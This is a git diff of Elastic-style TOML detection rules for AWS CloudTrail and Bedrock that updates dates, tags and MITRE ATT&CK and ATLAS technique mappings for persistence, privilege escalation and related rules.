+[[rule.threat.technique.subtechnique]] +id = "T1578.005" +name = "Modify Cloud Compute Configurations" +reference = "https://attack.mitre.org/techniques/T1578/005/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["cloud.account.id", "user.name"] diff --git a/rules/integrations/aws/persistence_sensitive_operations_via_cloudshell.toml b/rules/integrations/aws/persistence_sensitive_operations_via_cloudshell.toml index 1ada122b033..51d909014ae 100644 --- a/rules/integrations/aws/persistence_sensitive_operations_via_cloudshell.toml +++ b/rules/integrations/aws/persistence_sensitive_operations_via_cloudshell.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/10" integration = ["aws"] maturity = "production" -updated_date = "2026/02/18" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -121,39 +121,54 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + [[rule.threat.technique]] id = "T1136" name = "Create Account" reference = "https://attack.mitre.org/techniques/T1136/" + [[rule.threat.technique.subtechnique]] id = "T1136.003" name = "Cloud Account" reference = "https://attack.mitre.org/techniques/T1136/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/persistence_sts_assume_role_with_new_mfa.toml b/rules/integrations/aws/persistence_sts_assume_role_with_new_mfa.toml index fefefd67732..d2efba1a208 100644 --- a/rules/integrations/aws/persistence_sts_assume_role_with_new_mfa.toml +++ b/rules/integrations/aws/persistence_sts_assume_role_with_new_mfa.toml @@ -2,7 +2,7 @@ creation_date = "2024/10/25" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] @@ -63,17 +63,7 @@ references = [ risk_score = 21 rule_id = "a22f566b-5b23-4412-880d-c6c957acd321" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS STS", - "Use Case: Identity and Access Audit", - "Tactic: Privilege Escalation", - "Tactic: Persistence", - "Tactic: Lateral Movement", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS STS", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -106,49 +96,39 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" -[[rule.threat.technique.subtechnique]] -id = "T1556.006" -name = "Multi-Factor Authentication" -reference = "https://attack.mitre.org/techniques/T1556/006/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" -[[rule.threat.technique.subtechnique]] -id = "T1550.001" -name = "Application Access Token" -reference = "https://attack.mitre.org/techniques/T1550/001/" - - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - [rule.new_terms] field = "new_terms_fields" value = ["user.id", "aws.cloudtrail.flattened.request_parameters.serialNumber"] diff --git a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml index 7a16cf870c9..5b219d895c2 100644 --- a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml +++ b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/31" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -121,39 +121,39 @@ iam where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml index 87734bebf8d..591f18d2a80 100644 --- a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml +++ b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/31" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -119,39 +119,39 @@ iam where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml index f694877d86f..066335da0e3 100644 --- a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml +++ b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/30" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -123,39 +123,29 @@ iam where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - - [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_iam_customer_managed_policy_attached_to_role.toml b/rules/integrations/aws/privilege_escalation_iam_customer_managed_policy_attached_to_role.toml index 628f3841116..25ef1309ea1 100644 --- a/rules/integrations/aws/privilege_escalation_iam_customer_managed_policy_attached_to_role.toml +++ b/rules/integrations/aws/privilege_escalation_iam_customer_managed_policy_attached_to_role.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["aws"] maturity = "production" -updated_date = "2026/01/22" +updated_date = "2026/03/23" min_stack_comments = "New entity classification fields added: entity.target.id" min_stack_version = "9.2.0" @@ -77,15 +77,7 @@ references = ["https://docs.aws.amazon.com/IAM/latest/APIReference/API_AttachRol risk_score = 21 rule_id = "f6d07a70-9ad0-11ef-954f-f661ea17fbcd" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS IAM", - "Resources: Investigation Guide", - "Use Case: Identity and Access Audit", - "Tactic: Privilege Escalation", -] +tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS IAM", "Resources: Investigation Guide", "Use Case: Identity and Access Audit"] timestamp_override = "event.ingested" type = "new_terms" @@ -100,22 +92,29 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" -[[rule.threat.technique.subtechnique]] -id = "T1548.005" -name = "Temporary Elevated Cloud Access" -reference = "https://attack.mitre.org/techniques/T1548/005/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_iam_saml_provider_updated.toml b/rules/integrations/aws/privilege_escalation_iam_saml_provider_updated.toml index 4b9ab1316e7..15745c5cb4d 100644 --- a/rules/integrations/aws/privilege_escalation_iam_saml_provider_updated.toml +++ b/rules/integrations/aws/privilege_escalation_iam_saml_provider_updated.toml @@ -2,7 +2,7 @@ creation_date = "2021/09/22" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic", "Austin Songer"] @@ -102,15 +102,7 @@ references = ["https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAM risk_score = 47 rule_id = "979729e7-0c52-4c4c-b71e-88103304a79f" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS IAM", - "Use Case: Identity and Access Audit", - "Tactic: Privilege Escalation", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS IAM", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "query" @@ -125,22 +117,39 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1484" name = "Domain or Tenant Policy Modification" reference = "https://attack.mitre.org/techniques/T1484/" + [[rule.threat.technique.subtechnique]] id = "T1484.002" name = "Trust Modification" reference = "https://attack.mitre.org/techniques/T1484/002/" +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1484" +name = "Domain or Tenant Policy Modification" +reference = "https://attack.mitre.org/techniques/T1484/" + +[[rule.threat.technique.subtechnique]] +id = "T1484.002" +name = "Trust Modification" +reference = "https://attack.mitre.org/techniques/T1484/002/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_iam_update_assume_role_policy.toml b/rules/integrations/aws/privilege_escalation_iam_update_assume_role_policy.toml index bc91f308bb7..8e13ad18bb8 100644 --- a/rules/integrations/aws/privilege_escalation_iam_update_assume_role_policy.toml +++ b/rules/integrations/aws/privilege_escalation_iam_update_assume_role_policy.toml @@ -2,7 +2,7 @@ creation_date = "2020/07/06" integration = ["aws"] maturity = "production" -updated_date = "2026/01/22" +updated_date = "2026/03/23" min_stack_comments = "New entity classification fields added: entity.target.id" min_stack_version = "9.2.0" @@ -75,15 +75,7 @@ references = ["https://labs.bishopfox.com/tech-blog/5-privesc-attack-vectors-in- risk_score = 21 rule_id = "a60326d7-dca7-4fb7-93eb-1ca03a1febbd" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS IAM", - "Use Case: Identity and Access Audit", - "Resources: Investigation Guide", - "Tactic: Privilege Escalation", -] +tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS IAM", "Use Case: Identity and Access Audit", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -97,22 +89,39 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_role_assumption_by_service.toml b/rules/integrations/aws/privilege_escalation_role_assumption_by_service.toml index c65c86306e6..91424af9073 100644 --- a/rules/integrations/aws/privilege_escalation_role_assumption_by_service.toml +++ b/rules/integrations/aws/privilege_escalation_role_assumption_by_service.toml @@ -2,7 +2,7 @@ creation_date = "2021/05/17" integration = ["aws"] maturity = "production" -updated_date = "2025/12/16" +updated_date = "2026/03/23" [rule] author = ["Elastic", "Austin Songer"] @@ -73,16 +73,7 @@ references = ["https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRol risk_score = 21 rule_id = "93075852-b0f5-4b8b-89c3-a226efae5726" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS STS", - "Resources: Investigation Guide", - "Use Case: Identity and Access Audit", - "Tactic: Privilege Escalation", - "Tactic: Lateral Movement", -] +tags = ["Domain: Cloud", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS STS", "Resources: Investigation Guide", "Use Case: Identity and Access Audit"] timestamp_override = "event.ingested" type = "new_terms" @@ -109,34 +100,21 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" -[[rule.threat.technique.subtechnique]] -id = "T1550.001" -name = "Application Access Token" -reference = "https://attack.mitre.org/techniques/T1550/001/" - - - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_role_assumption_by_user.toml b/rules/integrations/aws/privilege_escalation_role_assumption_by_user.toml index 0abf5a097d8..cd0e19ac332 100644 --- a/rules/integrations/aws/privilege_escalation_role_assumption_by_user.toml +++ b/rules/integrations/aws/privilege_escalation_role_assumption_by_user.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/05" integration = ["aws"] maturity = "production" -updated_date = "2026/02/27" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -71,16 +71,7 @@ references = ["https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRol risk_score = 21 rule_id = "288a198e-9b9b-11ef-a0a8-f661ea17fbcd" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS STS", - "Resources: Investigation Guide", - "Use Case: Identity and Access Audit", - "Tactic: Privilege Escalation", - "Tactic: Lateral Movement", -] +tags = ["Domain: Cloud", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS STS", "Resources: Investigation Guide", "Use Case: Identity and Access Audit"] timestamp_override = "event.ingested" type = "new_terms" @@ -95,34 +86,21 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" +[[rule.threat.technique.subtechnique]] +id = "T1548.005" +name = "Temporary Elevated Cloud Access" +reference = "https://attack.mitre.org/techniques/T1548/005/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" -[[rule.threat.technique.subtechnique]] -id = "T1550.001" -name = "Application Access Token" -reference = "https://attack.mitre.org/techniques/T1550/001/" - - - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_sts_assume_root_from_rare_user_and_member_account.toml b/rules/integrations/aws/privilege_escalation_sts_assume_root_from_rare_user_and_member_account.toml index 49cbe18daaf..ce86a7ec2d3 100644 --- a/rules/integrations/aws/privilege_escalation_sts_assume_root_from_rare_user_and_member_account.toml +++ b/rules/integrations/aws/privilege_escalation_sts_assume_root_from_rare_user_and_member_account.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/24" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -161,39 +161,21 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" + [[rule.threat.technique.subtechnique]] id = "T1548.005" name = "Temporary Elevated Cloud Access" reference = "https://attack.mitre.org/techniques/T1548/005/" - - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - - - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_sts_role_chaining.toml b/rules/integrations/aws/privilege_escalation_sts_role_chaining.toml index 6e489d34aec..5d7bc1dd47b 100644 --- a/rules/integrations/aws/privilege_escalation_sts_role_chaining.toml +++ b/rules/integrations/aws/privilege_escalation_sts_role_chaining.toml @@ -2,7 +2,7 @@ creation_date = "2024/10/23" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -89,17 +89,7 @@ references = [ risk_score = 47 rule_id = "ba5a0b0c-b477-4729-a3dc-0147c2049cf1" severity = "medium" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS STS", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Privilege Escalation", - "Tactic: Lateral Movement", - "Resources: Investigation Guide", -] +tags = ["Domain: Cloud", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS STS", "Use Case: Threat Detection", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -134,41 +124,39 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" -[[rule.threat.technique.subtechnique]] -id = "T1550.001" -name = "Application Access Token" -reference = "https://attack.mitre.org/techniques/T1550/001/" - +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" [rule.new_terms] field = "new_terms_fields" value = ["aws.cloudtrail.user_identity.session_context.session_issuer.arn", "aws.cloudtrail.resources.arn"] diff --git a/rules/integrations/aws/resource_development_sns_topic_created_by_rare_user.toml b/rules/integrations/aws/resource_development_sns_topic_created_by_rare_user.toml index 275e3f821a8..d4dcde5af1c 100644 --- a/rules/integrations/aws/resource_development_sns_topic_created_by_rare_user.toml +++ b/rules/integrations/aws/resource_development_sns_topic_created_by_rare_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/11" integration = ["aws"] maturity = "production" -updated_date = "2026/01/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -79,16 +79,7 @@ references = [ risk_score = 21 rule_id = "3c3f65b8-e8b4-11ef-9511-f661ea17fbce" severity = "low" -tags = [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS SNS", - "Resources: Investigation Guide", - "Use Case: Threat Detection", - "Tactic: Resource Development", - "Tactic: Impact", -] +tags = ["Domain: Cloud", "Tactic: Impact", "Data Source: AWS", "Data Source: Amazon Web Services", "Data Source: AWS SNS", "Resources: Investigation Guide", "Use Case: Threat Detection"] timestamp_override = "event.ingested" type = "new_terms" @@ -102,33 +93,21 @@ event.dataset: "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1608" -name = "Stage Capabilities" -reference = "https://attack.mitre.org/techniques/T1608/" - -[rule.threat.tactic] -id = "TA0042" -name = "Resource Development" -reference = "https://attack.mitre.org/tactics/TA0042/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1496" name = "Resource Hijacking" reference = "https://attack.mitre.org/techniques/T1496/" + [[rule.threat.technique.subtechnique]] id = "T1496.004" name = "Cloud Service Hijacking" reference = "https://attack.mitre.org/techniques/T1496/004/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws_bedrock/aws_bedrock_execution_without_guardrails.toml b/rules/integrations/aws_bedrock/aws_bedrock_execution_without_guardrails.toml index a500a627229..342420cbf1c 100644 --- a/rules/integrations/aws_bedrock/aws_bedrock_execution_without_guardrails.toml +++ b/rules/integrations/aws_bedrock/aws_bedrock_execution_without_guardrails.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/25" integration = ["aws_bedrock"] maturity = "production" -updated_date = "2025/09/25" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -67,15 +67,7 @@ This rule requires that guardrails are configured in AWS Bedrock. For more infor https://docs.aws.amazon.com/bedrock/latest/userguide/guardrails-create.html """ severity = "medium" -tags = [ - "Domain: LLM", - "Data Source: AWS Bedrock", - "Data Source: AWS S3", - "Resources: Investigation Guide", - "Use Case: Policy Violation", - "Mitre Atlas: T0051", - "Mitre Atlas: T0054", -] +tags = ["Domain: LLM", "Tactic: Defense Evasion", "Tactic: AI Model Access", "Data Source: AWS Bedrock", "Data Source: AWS S3", "Resources: Investigation Guide", "Use Case: Policy Violation", "Mitre Atlas: T0051", "Mitre Atlas: T0054"] timestamp_override = "event.ingested" type = "esql" @@ -107,3 +99,41 @@ from logs-aws_bedrock.invocation-* | sort Esql.ml_invocations_no_guardrails_count desc ''' +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATLAS" + +[[rule.threat.technique]] +id = "AML.T0040" +name = "AI Model Inference API Access" +reference = "https://atlas.mitre.org/techniques/AML.T0040/" + +[rule.threat.tactic] +id = "AML.TA0000" +name = "AI Model Access" +reference = "https://atlas.mitre.org/tactics/AML.TA0000/" + +[[rule.threat]] +framework = "MITRE ATLAS" + +[[rule.threat.technique]] +id = "AML.T0094" +name = "Delay Execution of LLM Instructions" +reference = "https://atlas.mitre.org/techniques/AML.T0094/" + +[rule.threat.tactic] +id = "AML.TA0007" +name = "Defense Evasion" +reference = "https://atlas.mitre.org/tactics/AML.TA0007/" 